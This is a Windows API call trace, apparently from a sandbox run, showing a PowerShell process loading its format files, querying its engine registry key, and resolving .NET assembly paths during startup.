	[0380.184] ReadFile (in: hFile=0x304, lpBuffer=0x32dff00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x32dff00*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0380.184] ReadFile (in: hFile=0x304, lpBuffer=0x32dff00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x32dff00*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0380.185] ReadFile (in: hFile=0x304, lpBuffer=0x32dff00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x32dff00*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0380.185] ReadFile (in: hFile=0x304, lpBuffer=0x32dff00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x32dff00*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0380.185] ReadFile (in: hFile=0x304, lpBuffer=0x32dff00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x32dff00*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0380.185] ReadFile (in: hFile=0x304, lpBuffer=0x32dff00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x32dff00*, lpNumberOfBytesRead=0x24ce18*=0xaca, lpOverlapped=0x0) returned 1
	[0380.186] ReadFile (in: hFile=0x304, lpBuffer=0x32df532, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x32df532*, lpNumberOfBytesRead=0x24ce18*=0x0, lpOverlapped=0x0) returned 1
	[0380.186] ReadFile (in: hFile=0x304, lpBuffer=0x32dff00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x32dff00*, lpNumberOfBytesRead=0x24ce18*=0x0, lpOverlapped=0x0) returned 1
	[0380.186] CloseHandle (hObject=0x304) returned 1
	[0380.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0380.186] SetErrorMode (uMode=0x1) returned 0x1
	[0380.186] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24cdc0 | out: lpFileInformation=0x24cdc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0380.186] SetErrorMode (uMode=0x1) returned 0x1
	[0380.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24caf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0380.187] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24cea8 | out: phkResult=0x24cea8*=0x304) returned 0x0
	[0380.187] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24ce2c, lpData=0x0, lpcbData=0x24ce28*=0x0 | out: lpType=0x24ce2c*=0x1, lpData=0x0, lpcbData=0x24ce28*=0x56) returned 0x0
	[0380.187] CoTaskMemAlloc (cb=0x5a) returned 0x1b77aa10
	[0380.187] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24cdfc, lpData=0x1b77aa10, lpcbData=0x24cdf8*=0x56 | out: lpType=0x24cdfc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24cdf8*=0x56) returned 0x0
	[0380.187] CoTaskMemFree (pv=0x1b77aa10) 
	[0380.187] RegCloseKey (hKey=0x304) returned 0x0
	[0380.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24caf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0380.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0380.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0380.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0380.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0380.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0380.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0380.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0380.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0380.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0380.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0380.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0380.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0380.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0380.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0380.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0380.669] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0380.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0380.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0380.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0380.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0380.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0380.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0380.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0380.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0381.196] VirtualQuery (in: lpAddress=0x24b940, lpBuffer=0x24c800, dwLength=0x30 | out: lpBuffer=0x24c800*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0381.197] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xb4c7ca63, Data2=0xdee9, Data3=0x437f, Data4=([0]=0xb8, [1]=0xc1, [2]=0x79, [3]=0x2c, [4]=0x9, [5]=0x25, [6]=0xb5, [7]=0x49))) returned 0x0
	[0381.198] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xca3de5cc, Data2=0x25d2, Data3=0x43b7, Data4=([0]=0x88, [1]=0x52, [2]=0xb8, [3]=0x8a, [4]=0x14, [5]=0xad, [6]=0x69, [7]=0xf))) returned 0x0
	[0381.198] VirtualQuery (in: lpAddress=0x24baf0, lpBuffer=0x24c9b0, dwLength=0x30 | out: lpBuffer=0x24c9b0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0381.199] VirtualQuery (in: lpAddress=0x24baf0, lpBuffer=0x24c9b0, dwLength=0x30 | out: lpBuffer=0x24c9b0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0381.200] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xfc7aed8, Data2=0xe080, Data3=0x4c36, Data4=([0]=0x91, [1]=0xbe, [2]=0x6b, [3]=0x26, [4]=0x4e, [5]=0x48, [6]=0x9e, [7]=0xad))) returned 0x0
	[0381.203] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x53b82eb, Data2=0xb6ae, Data3=0x451e, Data4=([0]=0x85, [1]=0x82, [2]=0x7c, [3]=0xae, [4]=0x5b, [5]=0xa3, [6]=0x7e, [7]=0xce))) returned 0x0
	[0381.203] VirtualQuery (in: lpAddress=0x24bd40, lpBuffer=0x24cc00, dwLength=0x30 | out: lpBuffer=0x24cc00*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0381.204] VirtualQuery (in: lpAddress=0x24ba80, lpBuffer=0x24c940, dwLength=0x30 | out: lpBuffer=0x24c940*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0381.204] VirtualQuery (in: lpAddress=0x24ba80, lpBuffer=0x24c940, dwLength=0x30 | out: lpBuffer=0x24c940*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0381.204] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x786423c0, Data2=0x3dda, Data3=0x49ed, Data4=([0]=0xbe, [1]=0x4, [2]=0x24, [3]=0x5c, [4]=0x37, [5]=0xa2, [6]=0x4f, [7]=0x6e))) returned 0x0
	[0381.204] VirtualQuery (in: lpAddress=0x24bd40, lpBuffer=0x24cc00, dwLength=0x30 | out: lpBuffer=0x24cc00*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0381.211] VirtualQuery (in: lpAddress=0x24bb60, lpBuffer=0x24ca20, dwLength=0x30 | out: lpBuffer=0x24ca20*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0381.211] VirtualQuery (in: lpAddress=0x24b3b0, lpBuffer=0x24c270, dwLength=0x30 | out: lpBuffer=0x24c270*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0381.212] VirtualQuery (in: lpAddress=0x24b3b0, lpBuffer=0x24c270, dwLength=0x30 | out: lpBuffer=0x24c270*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0381.212] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x4d42696d, Data2=0x9495, Data3=0x4438, Data4=([0]=0xa4, [1]=0xd3, [2]=0xfc, [3]=0x1c, [4]=0x7f, [5]=0x84, [6]=0x9c, [7]=0x7d))) returned 0x0
	[0381.212] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x75d1691b, Data2=0x2c83, Data3=0x4340, Data4=([0]=0xba, [1]=0x8c, [2]=0xf6, [3]=0x7c, [4]=0x68, [5]=0x5b, [6]=0x4f, [7]=0x4d))) returned 0x0
	[0381.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24c890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0381.212] SetErrorMode (uMode=0x1) returned 0x1
	[0381.212] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0381.212] GetFileType (hFile=0x304) returned 0x1
	[0381.212] SetErrorMode (uMode=0x1) returned 0x1
	[0381.212] GetFileType (hFile=0x304) returned 0x1
	[0381.213] ReadFile (in: hFile=0x304, lpBuffer=0x33924f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x33924f8*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0381.214] ReadFile (in: hFile=0x304, lpBuffer=0x33924f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x33924f8*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0381.214] ReadFile (in: hFile=0x304, lpBuffer=0x33924f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x33924f8*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0381.214] ReadFile (in: hFile=0x304, lpBuffer=0x33924f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x33924f8*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0381.215] ReadFile (in: hFile=0x304, lpBuffer=0x33924f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x33924f8*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0381.215] ReadFile (in: hFile=0x304, lpBuffer=0x33924f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x33924f8*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0381.215] ReadFile (in: hFile=0x304, lpBuffer=0x33924f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x33924f8*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0381.215] ReadFile (in: hFile=0x304, lpBuffer=0x33924f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x33924f8*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0381.216] ReadFile (in: hFile=0x304, lpBuffer=0x33924f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x33924f8*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0381.216] ReadFile (in: hFile=0x304, lpBuffer=0x33924f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x33924f8*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0381.216] ReadFile (in: hFile=0x304, lpBuffer=0x33924f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x33924f8*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0381.216] ReadFile (in: hFile=0x304, lpBuffer=0x33924f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x33924f8*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0381.216] ReadFile (in: hFile=0x304, lpBuffer=0x33924f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x33924f8*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0381.217] ReadFile (in: hFile=0x304, lpBuffer=0x33924f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x33924f8*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0381.217] ReadFile (in: hFile=0x304, lpBuffer=0x33924f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x33924f8*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0381.217] ReadFile (in: hFile=0x304, lpBuffer=0x33924f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x33924f8*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0381.218] ReadFile (in: hFile=0x304, lpBuffer=0x33924f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x33924f8*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0381.218] ReadFile (in: hFile=0x304, lpBuffer=0x33924f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x33924f8*, lpNumberOfBytesRead=0x24ce18*=0xbce, lpOverlapped=0x0) returned 1
	[0381.219] ReadFile (in: hFile=0x304, lpBuffer=0x3391c2e, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x3391c2e*, lpNumberOfBytesRead=0x24ce18*=0x0, lpOverlapped=0x0) returned 1
	[0381.219] ReadFile (in: hFile=0x304, lpBuffer=0x33924f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x33924f8*, lpNumberOfBytesRead=0x24ce18*=0x0, lpOverlapped=0x0) returned 1
	[0381.219] CloseHandle (hObject=0x304) returned 1
	[0381.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0381.219] SetErrorMode (uMode=0x1) returned 0x1
	[0381.219] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24cdc0 | out: lpFileInformation=0x24cdc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0381.219] SetErrorMode (uMode=0x1) returned 0x1
